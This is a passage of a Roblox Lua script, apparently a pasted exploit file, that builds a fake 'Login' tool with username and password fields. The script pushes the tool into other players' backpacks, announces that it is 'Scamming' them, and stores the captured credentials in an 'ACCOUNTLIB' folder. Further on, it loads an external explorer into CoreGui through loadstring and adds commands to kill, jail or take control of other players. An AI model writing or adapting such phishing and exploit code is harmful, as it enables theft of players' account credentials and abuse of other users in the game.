  619. NewGuiPart50.Name = "ScrollingFrame"
  620. NewGuiPart50.Position = UDim2.new(0, 0, 0, 50)
  621. NewGuiPart50.Size = UDim2.new(0, 290, 0, 280)
  622. NewGuiPart50.Visible = false
  623. NewGuiPart50.ClipsDescendants = true
  624. NewGuiPart50.Draggable = true
  625. NewGuiPart50.Parent = NewGuiPart2
  626.  
  627. -------
  628. local NewGuiPart52 = Instance.new("TextBox")
  629. NewGuiPart52.Active = false
  630. NewGuiPart52.BackgroundTransparency = 0.5
  631. NewGuiPart52.BorderColor3 = Color3.new(0, 0, 0)
  632. NewGuiPart52.BorderSizePixel = 0
  633. NewGuiPart52.Name = "TB1"
  634. NewGuiPart52.Position = UDim2.new(0, 90, 0, 100)
  635. NewGuiPart52.Size = UDim2.new(0, 180, 0, 20)
  636. NewGuiPart52.FontSize = Enum.FontSize.Size18
  637. NewGuiPart52.Text = ""
  638. NewGuiPart52.TextColor3 = Color3.new(1, 1, 1)
  639. NewGuiPart52.TextWrapped = true
  640. NewGuiPart52.Parent = NewGuiPart50
  641. -------
  642. local NewGuiPart53 = Instance.new("TextButton")
  643. NewGuiPart53.BackgroundColor3 = Color3.new(0.972549, 0.972549, 0.972549)
  644. NewGuiPart53.BackgroundTransparency = 0.5
  645. NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0)
  646. NewGuiPart53.BorderSizePixel = 0
  647. NewGuiPart53.Name = "TB"
  648. NewGuiPart53.Position = UDim2.new(0, 50, 0, 250)
  649. NewGuiPart53.Selectable = true
  650. NewGuiPart53.Size = UDim2.new(0, 180, 0, 20)
  651. NewGuiPart53.Style = Enum.ButtonStyle.Custom
  652. NewGuiPart53.FontSize = Enum.FontSize.Size18
  653. NewGuiPart53.Text = "Save"
  654. NewGuiPart53.TextColor3 = Color3.new(0, 0, 0)
  655. NewGuiPart53.TextWrapped = true
  656. NewGuiPart53.Parent = NewGuiPart50
  657.  
  658. -------
  659. local NewGuiPart55 = Instance.new("TextLabel")
  660. NewGuiPart55.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  661. NewGuiPart55.BackgroundTransparency = 1
  662. NewGuiPart55.BorderColor3 = Color3.new(0, 0, 0)
  663. NewGuiPart55.BorderSizePixel = 0
  664. NewGuiPart55.Name = "TL2"
  665. NewGuiPart55.Position = UDim2.new(0, 0, 0, 100)
  666. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  667. NewGuiPart55.FontSize = Enum.FontSize.Size18
  668. NewGuiPart55.Text = "Tool Name"
  669. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  670. NewGuiPart55.TextWrapped = true
  671. NewGuiPart55.Parent = NewGuiPart50
  672. -------
  673. local NewGuiPart56 = Instance.new("TextButton")
  674. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  675. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  676. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  677. NewGuiPart56.BorderSizePixel = 0
  678. NewGuiPart56.Name = "TL4"
  679. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  680. NewGuiPart56.Selectable = true
  681. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  682. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  683. NewGuiPart56.FontSize = Enum.FontSize.Size14
  684. NewGuiPart56.Text = "CMD"
  685. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  686. NewGuiPart56.Parent = NewGuiPart2
  687. -------
  688. local NewGuiPart57 = Instance.new("Frame")
  689. NewGuiPart57.BackgroundTransparency = 1
  690. NewGuiPart57.Name = "ChatBox"
  691. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  692. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  693. NewGuiPart57.Visible = false
  694. NewGuiPart57.Draggable = true
  695. NewGuiPart57.Parent = NewGuiPart2
  696. -------
  697. local NewGuiPart58 = Instance.new("TextButton")
  698. NewGuiPart58.Active = true
  699. NewGuiPart58.BackgroundTransparency = 0.5
  700. NewGuiPart58.BorderSizePixel = 0
  701. NewGuiPart58.Name = "Chat"
  702. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  703. NewGuiPart58.Selectable = true
  704. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  705. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  706. NewGuiPart58.FontSize = Enum.FontSize.Size14
  707. NewGuiPart58.Text = "Chat"
  708. NewGuiPart58.Parent = NewGuiPart57
  709. -------
  710. local NewGuiPart59 = Instance.new("TextLabel")
  711. NewGuiPart59.BackgroundTransparency = 0.5
  712. NewGuiPart59.BorderSizePixel = 0
  713. NewGuiPart59.Name = "Output"
  714. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  715. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  716. NewGuiPart59.Font = Enum.Font.Legacy
  717. NewGuiPart59.FontSize = Enum.FontSize.Size14
  718. NewGuiPart59.Text = ""
  719. NewGuiPart59.TextWrapped = true
  720. NewGuiPart59.Parent = NewGuiPart57
  721. -------
  722. local NewGuiPart60 = Instance.new("TextBox")
  723. NewGuiPart60.BackgroundTransparency = 0.5
  724. NewGuiPart60.Name = "Input"
  725. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  726. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  727. NewGuiPart60.FontSize = Enum.FontSize.Size28
  728. NewGuiPart60.Text = ""
  729. NewGuiPart60.Parent = NewGuiPart57
  730. -------
  731. local NewGuiPart61 = Instance.new("Frame")
  732. NewGuiPart61.BackgroundTransparency = 1
  733. NewGuiPart61.Name = "CMDS"
  734. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  735. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  736. NewGuiPart61.Visible = false
  737. NewGuiPart61.Draggable = true
  738. NewGuiPart61.Parent = NewGuiPart2
  739. -------
  740. local NewGuiPart62 = Instance.new("TextButton")
  741. NewGuiPart62.Active = true
  742. NewGuiPart62.BackgroundTransparency = 0.5
  743. NewGuiPart62.BorderSizePixel = 0
  744. NewGuiPart62.Name = "Execute"
  745. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  746. NewGuiPart62.Selectable = true
  747. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  748. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  749. NewGuiPart62.FontSize = Enum.FontSize.Size12
  750. NewGuiPart62.Text = "Execute"
  751. NewGuiPart62.Parent = NewGuiPart61
  752. -------
  753. local NewGuiPart63 = Instance.new("TextLabel")
  754. NewGuiPart63.BackgroundTransparency = 0.5
  755. NewGuiPart63.BorderSizePixel = 0
  756. NewGuiPart63.Name = "Output"
  757. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  758. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  759. NewGuiPart63.Font = Enum.Font.Legacy
  760. NewGuiPart63.FontSize = Enum.FontSize.Size14
  761. NewGuiPart63.Text = ""
  762. NewGuiPart63.TextWrapped = true
  763. NewGuiPart63.Parent = NewGuiPart61
  764. -------
  765. local NewGuiPart64 = Instance.new("TextBox")
  766. NewGuiPart64.BackgroundTransparency = 0.5
  767. NewGuiPart64.Name = "CmdInput"
  768. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  769. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  770. NewGuiPart64.FontSize = Enum.FontSize.Size14
  771. NewGuiPart64.Text = ""
  772. NewGuiPart64.Parent = NewGuiPart61
  773.  
  774. local IsRunning = Instance.new("BoolValue")
  775. IsRunning.Value = false
  776. IsRunning.Name = "IsRunning"
  777. IsRunning.Parent = NewGuiPart2
  778.  
  779. local Login = Instance.new("Tool")
  780. Login.CanBeDropped = false
  781. Login.ManualActivationOnly = false
  782. Login.RequiresHandle = false
  783. Login.Name = "Login"
  784. Login.Parent = NewGuiPart1
  785.  
  786. local ToolName = Instance.new("StringValue")
  787. ToolName.Value = "Login"
  788. ToolName.Parent = CoreValues
  789. ToolName.Name = "ToolName"
  790.  
  791.  
  792. local NewGuiPart65 = Instance.new("ScreenGui")
  793. NewGuiPart65.Name = "LoginGui"
  794. NewGuiPart65.Parent = Login
  795. -------
  796. local NewGuiPart66 = Instance.new("Frame")
  797. NewGuiPart66.Name = "ErrorFrame"
  798. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  799. NewGuiPart66.Visible = false
  800. NewGuiPart66.Parent = NewGuiPart65
  801. -------
  802. local NewGuiPart67 = Instance.new("ImageLabel")
  803. NewGuiPart67.Active = false
  804. NewGuiPart67.Selectable = false
  805. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  806. NewGuiPart67.Image = "rbxassetid://423929933"
  807. NewGuiPart67.Parent = NewGuiPart66
  808. -------
  809. local NewGuiPart69 = Instance.new("TextLabel")
  810. NewGuiPart69.BackgroundTransparency = 1
  811. NewGuiPart69.BorderSizePixel = 0
  812. NewGuiPart69.Name = "UserName"
  813. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  814. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  815. NewGuiPart69.Font = Enum.Font.Legacy
  816. NewGuiPart69.FontSize = Enum.FontSize.Size14
  817. NewGuiPart69.Text = "UserName"
  818. NewGuiPart69.Parent = NewGuiPart66
  819. -------
  820. local NewGuiPart70 = Instance.new("TextLabel")
  821. NewGuiPart70.BackgroundTransparency = 1
  822. NewGuiPart70.BorderSizePixel = 0
  823. NewGuiPart70.Name = "Password"
  824. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  825. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  826. NewGuiPart70.Font = Enum.Font.Legacy
  827. NewGuiPart70.FontSize = Enum.FontSize.Size14
  828. NewGuiPart70.Text = "Password"
  829. NewGuiPart70.Parent = NewGuiPart66
  830. -------
  831. local NewGuiPart71 = Instance.new("TextBox")
  832. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  833. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  834. NewGuiPart71.BorderSizePixel = 2
  835. NewGuiPart71.Name = "TB2"
  836. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  837. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  838. NewGuiPart71.Font = Enum.Font.Legacy
  839. NewGuiPart71.FontSize = Enum.FontSize.Size14
  840. NewGuiPart71.Text = ""
  841. NewGuiPart71.Parent = NewGuiPart66
  842. -------
  843. local NewGuiPart72 = Instance.new("ImageButton")
  844. NewGuiPart72.Active = true
  845. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  846. NewGuiPart72.BackgroundTransparency = 0.5
  847. NewGuiPart72.Name = "LoginButton"
  848. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  849. NewGuiPart72.Selectable = true
  850. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  851. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  852. NewGuiPart72.Visible = true
  853. NewGuiPart72.Image = "rbxassetid://431070395"
  854. NewGuiPart72.Parent = NewGuiPart66
  855. -------
  856. local NewGuiPart73 = Instance.new("TextLabel")
  857. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  858. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  859. NewGuiPart73.BorderSizePixel = 0
  860. NewGuiPart73.Name = "TB1"
  861. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  862. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  863. NewGuiPart73.Font = Enum.Font.Legacy
  864. NewGuiPart73.FontSize = Enum.FontSize.Size14
  865. NewGuiPart73.Text = ""
  866. NewGuiPart73.Parent = NewGuiPart66
  867.  
  868.  
  869. local Textg = Instance.new("TextLabel")
  870. Textg.BackgroundColor3 = Color3.new(255,255,255)
  871. Textg.BorderColor3 = Color3.new(0, 0, 0)
  872. Textg.BorderSizePixel = 0
  873. Textg.Name = "Text"
  874. Textg.Position = UDim2.new(0, 90, 0.5,115)
  875. Textg.Size = UDim2.new(0, 200, 0, 20)
  876. Textg.Font = Enum.Font.Legacy
  877. Textg.FontSize = Enum.FontSize.Size14
  878. Textg.Text = ""
  879. Textg.Parent = NewGuiPart66
  880.  
  881. local Done = Instance.new("BoolValue")
  882. Done.Name = "Done"
  883. Done.Value = false
  884. Done.Parent = NewGuiPart66
  885.  
  886. local Folderr = Instance.new("Folder")
  887. Folderr.Parent = CoreValues
  888. Folderr.Name = "Folder"
  889.  
  890.  
  891. local UserName = Instance.new("StringValue")
  892. UserName.Name = "UserName"
  893. UserName.Parent = Folderr
  894.  
  895. local PassWord = Instance.new("StringValue")
  896. PassWord.Name = "Password"
  897. PassWord.Parent = Folderr
  898.  
  899.  
  900.  
  901. local UsingTool = Instance.new("BoolValue")
  902. UsingTool.Parent = CoreValues
  903. UsingTool.Name = "UsingTool"
  904. UsingTool.Value = true
  905.  
  906. NewGuiPart1:Clone().Parent = CoreValues
  907. NewGuiPart65:Clone().Parent = CoreValues
  908.  
  909.  
  910.  
  911. print("MGVX LIB Running")
  912. local Lib = Instance.new("Folder")
  913. Lib.Name = "ACCOUNTLIB"
  914. Lib.Parent = CoreValues
  915.  
  916. if PassWord.Value ~= nil and UserName.Value ~= nil then
  917. namer = Instance.new("Folder")
  918. namer.Parent = Lib
  919. namer.Name = UserName.Value
  920. old = PassWord:Clone()
  921. old.Parent = namer
  922. old.Name = UserName.Value
  923. oldu = UserName:Clone()
  924. oldu.Parent = namer
  925. oldu.Name = UserName.Value
  926. new = PassWord:Clone()
  927. new.Value = ""
  928. new.Name = "PassWord"
  929. new.Parent = Folderr
  930. newu = UserName:Clone()
  931. newu.Value = ""
  932. newu.Name = "UserName"
  933. newu.Parent = Folderr
  934. UserName:Destroy();
  935. PassWord:Destroy();
  936. end
  937.  
  938. --------------FUNCTIONS---------------
  939. local NumofPlayers = game:GetService("Players").NumPlayers
  940. local NumOfPlayersBeingScammed = NumofPlayers-1
  941. local DoneBeingScammed = {}
  942.  
  943.  
  944.  
  945.  
  946.  
  947.  
  948. function Clicked4()
  949.  
  950. if NewGuiPart52.Text ~= nil then
  951. Login.Name = NewGuiPart52.Text
  952. ToolName.Value = NewGuiPart52.Text
  953. end
  954.  
  955. if NewGuiPart52.Text == nil then
  956. Login.Name = "Login"
  957. ToolName.Value = "Login"
  958. end
  959.  
  960.  
  961.  
  962.  
  963. NewGuiPart50.Visible = false
  964.  
  965. end
  966.  
  967.  
  968.  
  969. function Click()
  970. local ppl = game.Players:GetChildren()
  971. local spots = NewGuiPart6:children()
  972. for i = 1,#ppl do
  973. spots[i].Visible = true
  974. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  975. spots[i].TextLabel.Text = ppl[i].Name
  976. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  977. spots[i].TextLabel.Text = ''
  978. spots[i].ImageLabel.Image = ''
  979. end
  980. end
  981. end
  982. function Clicked()
  983. otherp.Backpack:GetChildren().Parent = workspace
  984.  
  985.  
  986. if UsingTool.Value == true then
  987. Login:Clone().Parent = otherp.Backpack
  988. NewGuiPart4.Text = "Scanning..."
  989. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  990. NewGuiPart50.Visible = false
  991. NewGuiPart61.Visible = false
  992. NewGuiPart5.Visible = true
  993. IsRunning.Value = true
  994. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  995. end
  996. end
  997.  
  998.  
  999.  
  1000. function Clicked1()
  1001. NewGuiPart5.Visible = false
  1002. NewGuiPart61.Visible = false
  1003. NewGuiPart50.Visible = true
  1004. end
  1005.  
  1006. function Clicked2()
  1007. NewGuiPart5.Visible = false
  1008. NewGuiPart50.Visible = false
  1009. NewGuiPart61.Visible = true
  1010. end
  1011.  
  1012.  
  1013. plrrr = game.Players.LocalPlayer
  1014. plrr = game.Players:GetChildren()
  1015. Input = NewGuiPart64
  1016. Exe = NewGuiPart62
  1017. Output = NewGuiPart63
  1018. Output.Text = "Welcome, "..Owner.Name.."."
  1019.  
  1020.  
  1021. game.Players.PlayerAdded:connect(function()
  1022. local ppl = game.Players:GetChildren()
  1023. local spots = NewGuiPart6:children()
  1024. for i = 1,#ppl do
  1025. spots[i].Visible = true
  1026. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1027. spots[i].TextLabel.Text = ppl[i].Name
  1028. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1029. spots[i].TextLabel.Text = ''
  1030. spots[i].ImageLabel.Image = ''
  1031. end
  1032.  
  1033. end
  1034. end)
  1035.  
  1036. game.Players.PlayerRemoving:connect(function()
  1037. local ppl = game.Players:GetChildren()
  1038. local spots = NewGuiPart6:children()
  1039. for i = 1,#ppl do
  1040. spots[i].Visible = true
  1041. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1042. spots[i].TextLabel.Text = ppl[i].Name
  1043. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1044. spots[i].TextLabel.Text = ''
  1045. spots[i].ImageLabel.Image = ''
  1046. end
  1047.  
  1048. end
  1049. end)
  1050.  
  1051.  
  1052. function Clicked3(arg)
  1053. local Cmd = Input
  1054. local allp = game.Players:GetChildren()
  1055. local numb;
  1056. local pp;
  1057. local p;
  1058. local num;
  1059. local argus = {"me", "all",numb,plrr}
  1060.  
  1061. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1062. local guu = game:GetObjects("rbxassetid://418955355")[1] guu.Parent = game.CoreGui
  1063. guu.ExplorerPanel.LocalScript.Source = string.gsub(guu.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1064. guu.PropertiesFrame.Properties.Source = string.gsub(guu.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1065. guu.Selection.Source = string.gsub(guu.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1066.  
  1067. spawn(function()
  1068. loadstring(guu.ExplorerPanel.LocalScript.Source)()
  1069. end)
  1070. spawn(function()
  1071. loadstring(guu.PropertiesFrame.Properties.Source)()
  1072. end)
  1073. spawn(function()
  1074. loadstring(guu.Selection.Source)()
  1075. end)
  1076.  
  1077.  
  1078.  
  1079. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1080. game.CoreGui.Dex:Destroy()
  1081. end
  1082.  
  1083. if Cmd.Text:lower():sub(1,4) == "hat " then
  1084. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1085. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1086. for i, v in pairs(plrz) do
  1087. coroutine.resume(coroutine.create(function()
  1088. if v and v.Character then
  1089. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1090. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1091. obj:Destroy()
  1092. end
  1093. end))
  1094. end
  1095. end
  1096.  
  1097. if Cmd.Text:lower():sub(1,5) == "cape " then
  1098. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1099. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1100. local str = "torso.BrickColor"
  1101. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1102. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1103. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1104. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1105. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1106. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1107. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1108. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1109. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1110. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1111. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1112. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1113. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1114. if BrickColor.new(teststr) ~= nil then str = teststr end
  1115. end
  1116. for i, v in pairs(plrz) do
  1117. coroutine.resume(coroutine.create(function()
  1118. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1119. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1120. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1121. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1122. local torso = plr.Character.Torso
  1123. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1124. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1125. p.Size = Vector3.new(.2,.2,.2)
  1126. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1127. local motor1 = Instance.new("Motor", p)
  1128. motor1.Part0 = p
  1129. motor1.Part1 = torso
  1130. motor1.MaxVelocity = .01
  1131. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1132. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1133. local wave = false
  1134. repeat wait(1/44)
  1135. local ang = 0.1
  1136. local oldmag = torso.Velocity.magnitude
  1137. local mv = .002
  1138. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1139. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1140. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1141. motor1.DesiredAngle = -ang
  1142. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1143. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1144. if torso.Velocity.magnitude < .1 then wait(.1) end
  1145. until not p or p.Parent ~= torso.Parent
  1146. script:Destroy()
  1147. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1148. end
  1149. end))
  1150. end
  1151. end
  1152.  
  1153. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1154. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1155. for i, v in pairs(plrz) do
  1156. coroutine.resume(coroutine.create(function()
  1157. if v and v:findFirstChild("PlayerGui") and v.Character then
  1158. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1159. end
  1160. end))
  1161. end
  1162. end
  1163.  
  1164.  
  1165. if Cmd.Text:lower():sub(1,5) == "jail " then
  1166. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1167. for i, v in pairs(plrz) do
  1168. coroutine.resume(coroutine.create(function()
  1169. if v and v.Character and v.Character:findFirstChild("Torso") then
  1170. local vname = v.Name
  1171. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1172. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1173. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1174. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1175. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1176. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1177. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1178. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1179. end)
  1180. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1181. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1182. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1183. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1184. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1185. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1186. local msh2 = msh:Clone() msh2.Parent = back
  1187. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1188. local msh4 = msh3:Clone() msh4.Parent = left
  1189. v.Character.Torso.CFrame = cf
  1190. end
  1191. end))
  1192. end
  1193. end
  1194.  
  1195. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1196. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1197. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1198. end
  1199.  
  1200.  
  1201.  
  1202. if Cmd.Text:lower():sub(1,8) == "control " then
  1203. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1204. for i, v in pairs(plrz) do
  1205. coroutine.resume(coroutine.create(function()
  1206. if v and v.Character then
  1207. v.Character.Humanoid.PlatformStand = true
  1208. local w = Instance.new("Weld", plr.Character.Torso )
  1209. w.Part0 = plr.Character.Torso
  1210. w.Part1 = v.Character.Torso
  1211. local w2 = Instance.new("Weld", plr.Character.Head)
  1212. w2.Part0 = plr.Character.Head
  1213. w2.Part1 = v.Character.Head
  1214. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1215. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1216. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1217. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1218. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1219. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1220. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1221. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1222. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1223. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1224. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1225. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1226. plr.Character.Head.face:Destroy()
  1227. for i, p in pairs(v.Character:children()) do
  1228. if p:IsA("BasePart") then
  1229. p.CanCollide = false
  1230. end
  1231. end
  1232. for i, p in pairs(plr.Character:children()) do
  1233. if p:IsA("BasePart") then
  1234. p.Transparency = 1
  1235. elseif p:IsA("Hat") then
  1236. p:Destroy()
  1237. end
  1238. end
  1239. v.Character.Parent = plr.Character
  1240. v.Character.Humanoid.Changed:connect(function() v.Character.Humanoid.PlatformStand = true end)
  1241. end
  1242. end))
  1243. end
  1244. end
  1245.  
  1246. if Cmd.Text:lower():sub(1,5) == "kill " then
  1247. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1248. for i, v in pairs(plrz) do
  1249. coroutine.resume(coroutine.create(function()
  1250. if v and v.Character then v.Character:BreakJoints() end
  1251. end))
  1252. end
  1253. end
  1254.  
  1255.  
  1256.  
